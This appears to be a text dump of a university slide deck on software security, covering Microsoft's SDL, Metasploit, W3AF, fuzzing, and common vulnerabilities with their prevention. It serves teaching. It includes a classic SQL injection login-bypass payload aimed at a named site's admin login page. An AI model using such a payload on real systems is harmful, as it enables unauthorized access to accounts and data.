kremer.cpsc.ucalgary.ca

kremer.cpsc.ucalgary.ca

Software Security Analysis Sydney Pratte, Gellert Kispal, Naomi Hiebert, Shena Fortozo, Adesh Banvait & Alaa Azazi Presentation Overview

Secure software development process Developer tools for testing security Common vulnerabilities and exploits Contest (with prizes!) Development Methods Secure Software Development Processes

Developing secure software is a matter of guidelines and strategies Such strategies provide guidelines in specific areas of software security

Secure Software Development Processes Secure software processes are methodologies and techniques that employ these strategies and guidelines into integrated and comprehensive construction processes for secure software development

Microsofts Security Development Lifecycle (SDL) OWASPs Comprehensive Lightweight Application Security Process (CLASP) Design &

Requirements Planning Evaluation Implementation Testing Microsofts Security

Development Lifecycle (SDL) Was adopted as a mandatory policy in 2004 to resolve the security concerns that have previously arisen in Microsofts products

Consists of: Mandatory Activities Optional Activities Microsofts Security Development Lifecycle (SDL)

Mandatory Activities Pre-SDL Requirements: Security Training o The training must at a minimum cover the fundamental concepts of software security

Microsofts Security Development Lifecycle (SDL) Mandatory Activities Phase One: Requirements o Security Requirements

Gathering o Risk Assessment o Quality Gates Microsofts Security Development Lifecycle (SDL) Mandatory Activities Phase Two: Design

o Analyze attack surface o Threat modeling Microsofts Security Development Lifecycle (SDL) Mandatory Activities

Phase Three: Implementation o Approve the tool-set to be used o Deprecate unsafe functions Microsofts Security Development Lifecycle (SDL)

Mandatory Activities Phase Four: Verification o Dynamic Testing o Fuzz Testing Microsofts Security Development Lifecycle (SDL)

Mandatory Activities Phase Five: Release o Incident Response Plan o Final Security Review o Release Archive Microsofts Security

Development Lifecycle (SDL) Optional Activities Manual Code Review o Focus on the critical components of the system

o Usually performed by an expert Microsofts Security Development Lifecycle (SDL) Optional Activities Penetration Testing o

Simulation of attacks on the system o Uses dynamic malformed random data to unveil potential security flaws Microsofts Security Development Lifecycle (SDL)

Optional Activities Vulnerability Analysis of Similar Applications o Investigating reputable vulnerabilities databases o Aids in avoiding potential security issues during the design and implementation phases

Development Tools Metasploit Project

Popular Framework for Exploit code development Open source editions available Identification of System Vulnerabilities Penetration Testing Modular approach for Exploit development Ability to combine different type of exploits with payloads Fuzzing

Automated Technique Find Memory Leaks and Exceptions o using invalid/random inputs Employed as Black-Box Testing Types of Fuzzing Programs o Mutation Based - Mutate existing data samples to create new

test data o Generation Based - Create new test data based on input model W3AF - Web Application Attack & Audit Framework Open source vulnerability scanner and exploitation tool o Identify SQL Injections o Cross-Site Scripting

o Guessable Credentials o Unhandled Application Errors o PHP Misconfigurations Employs Fuzzing techniques Divided into 'Core' & 'Plugins' part o Core Coordinates with plugins o Plugins find vulnerabilities in Target websites

W3AF - Web Application Attack & Audit Framework Over 130 Plugins available, categorize under o Discovery o Audit o Grep o Attack o Output

o Mangle o Evasion o Brute Force http://www.oxdef.info/papers/en/w3af/w3af-fu/ Vulnerabilities Vulnerabilities We will go over

SQL Injections Cross-Site Scripting Access Controls Timing Attacks

Buffer Overflows Denial of Service What is a Vulnerability? Insecure Interactions between Components Commonly user input and attack database-driven applications

SQL Injection What is it? Code Injection Improper neutralization of elements that could alter an SQL statement http://imgs.xkcd.com/comics/exploits_of_a_mom.png

SQL Injection Consequences Loss of Confidentiality Gateway to steal or corrupt data Weakens Security: Compromising access to system itself

SQL Injection Prevention Practice of Defensive Coding o Cleaning and Validating Input o Checking and Setting data types o Escaping Special Characters o Information Hiding: Alias & Unique field names SQL Injection

Example http://www.quickwrench.com/Admin/adminlogin.asp Username: admin Password: 'or' '=' SELECT *

FROM account WHERE username = 'admin' AND password = '' or '' = '' SQL Injection Summary Remember: If you don't clean and validate your input, you're going to have a bad time Cross-Site Scripting

What is it? Also known as XSS Commonly found in Web applications Enables an attacker to embed malicious code into a legitimate web page Example:

http://xss.com/index.php?name=guest Welcome Cross-Site Scripting Consequences

Compromise private information Manipulate or steal cookies Create a request on behalf of the victim Cross-Site Scripting How? Improper sanitization of data from a web request or user input Violates the web browsers same-origin policy! A document or script from one origin should not interact with a resource from another origin

Cross-Site Scripting Prevention Proper escaping and quoting Security checks on both client and server side Specifying a proper character encoding scheme

Whitelist of acceptable inputs Remember: The purpose is to steal one's information The victim is totally unaware of the attack since the malicious code is usually embedded in a link and runs on top of the legitimate website Access Controls Access Control Problems

Access control is the authentication of who is allowed to do exactly what in your system. Many software security vulnerabilities arise from deficiencies or lack of access control. Access Control Problems Examples

Missing Authentication Incorrect Authentication Allowance of Unlimited or Numerous Authentication Attempts Missing Authentication

Providing no authentication can lead to major software security vulnerabilities because users can access resources and perform actions that they should not be able to. Simply adding separate user privileges when designing a system can protect this functionality. Incorrect Authentication

Incorrect authentication is when access control is applied to certain resources or actions but are implemented in a way that can be bypassed. Allowance of Unlimited Authentication Attempts

Attackers repeatedly guess different passwords until they succeed. This vulnerability can be corrected by limiting the amount of failed attempts in a short amount of time. Attacks on Systems Timing Attack Basic Definition:

A form of attempt to compromise a system by analyzing the time taken to execute a cryptographic algorithm Timing Attack This code is closer to what will be executed at machine level Timing Attack Only works on offline systems typically; since one has to have an unlimited number of attempts Prevention: o

o Time delay after a certain number of attempts Return false, once you reach the end of string, instead of returning as you find an inequality Remember: The attacker must have unlimited attempts Mostly works on offline systems Buffer Overflow

Is a software fault that occurs during writing to memory. The program overruns the allocated space and writes into adjacent memory Most commonly found in C/C++ programs, because the default libraries do not provide bounds checking protection Buffer Overflow One can gain admin privileges by overwriting the memory slot where access permission are stored Prevention: o

Proper Check on Bounds Remember: The program is writing into memory that's it isn't supposed to Attacker can upgrade their privileges or even bypass the password Denial of Service An attempt to make a machine unavailable/busy and deny

service to it's intended users Commonly performed important systems such as bank websites and polling websites where people rely on the service heavily DoS does not compromise the system, no information leaked during the attack Denial of Service The attacks spoofs the IP address from which they start sending requests to a server The server replies, and spawns a thread for interaction

The client never replies therefore the thread on the server will hang Remember: The purpose is to disrupt an important online service Attackers don't gain access to the system Scenarios Scenario 1 A) Unlimited Attempts + Timing Attack

B) Cross-site Scripting C) Buffer Overflow D) Denial of Service E) SQL Injection Scenario 1 A) Unlimited Attempts + Timing Attack B) Cross-site Scripting C) Buffer Overflow D) Denial of Service

E) SQL Injection Scenario 2 A) Unlimited Attempts + Timing Attack B) Cross-site Scripting C) Buffer Overflow D) Denial of Service E) SQL Injection Scenario 2

A) Unlimited Attempts + Timing Attack B) Cross-site Scripting C) Buffer Overflow D) Denial of Service E) SQL Injection Scenario 3 A) Unlimited Attempts + Timing Attack B) Cross-site Scripting

C) Buffer Overflow D) Denial of Service E) SQL Injection Scenario 3 A) Unlimited Attempts + Timing Attack B) Cross-site Scripting C) Buffer Overflow D) Denial of Service E) SQL Injection

Scenario 4 A) Unlimited Attempts + Timing Attack B) Cross-site Scripting C) Buffer Overflow D) Denial of Service E) SQL Injection Scenario 4

A) Unlimited Attempts + Timing Attack B) Cross-site Scripting C) Buffer Overflow D) Denial of Service E) SQL Injection Questions?

Recently Viewed Presentations

  • Caring for Volunteers: Training of Trainers (NAME OF

    Caring for Volunteers: Training of Trainers (NAME OF

    If someone gets distressed, talk to all the participants about it, right after it has happened.
  • Chapter 5

    Chapter 5

    Like F, Cl, Br, I or At. Review. Section 5.1. matching _____ 1. the repeating chemical & physical properties of elements change. periodically with the atomic numbers of the elements _____ 2. a horizontal row of elements in the periodic...
  • Acquisition Valuation

    Acquisition Valuation

    ) Sources of Synergy A procedure for valuing synergy (1) the firms involved in the merger are valued independently, by discounting expected cash flows to each firm at the weighted average cost of capital for that firm. (2) the value...
  • Acute cortisol elevations bias memory formation in a

    Acute cortisol elevations bias memory formation in a

    An increase in negative recall bias for words encoded on the CORT (vs. placebo) day was found for depressed adults with history of loss, but CORT did not significantly alter recall bias in depressed adults without history of loss, t(16)...
  • Style Lesson 3: Actions - bfox.wdfiles.com

    Style Lesson 3: Actions - bfox.wdfiles.com

    The outsourcing of high-tech work to Asia by corporations means the loss of jobs for many Americans. Decide who your main characters are . Decide what actions these main characters perform (look especially to those nominalizations, those actions that became...
  • Droit fondamental et contrat - McGill University

    Droit fondamental et contrat - McGill University

    Question centraleposée par le virage justice privée: l'intérêt public en général et de l'ordre public en particulier. A terme, on peut imaginer assezfacilement, dansune perspective néo-libérale, un pouvoirjudiciairedont le rôleseraitlimité au contrôle et à la surveillance de la ...
  • Public Participation: Obligations & Opportunities MSFD, MSP &

    Public Participation: Obligations & Opportunities MSFD, MSP &

    Directive 2003/4/EC: allows public access to environmental informationand repeals Council Directive 90/313/EEC. Directive 2003/35/EC: provides for public participation when drawing up certain plans and programmes relating to the environment; also amends Council Directives 85/337/EEC and 96/61/EC with regard to public...
  • Spencer County High School

    Spencer County High School

    1 pe/health. 1 arts/humanities. 9 electives. must pass the state civics exam. ... expectations are higher . ... advanced geometry (students who will receive algebra 1 credit in 8th grade with a b or higher grade) social studies. integrated social...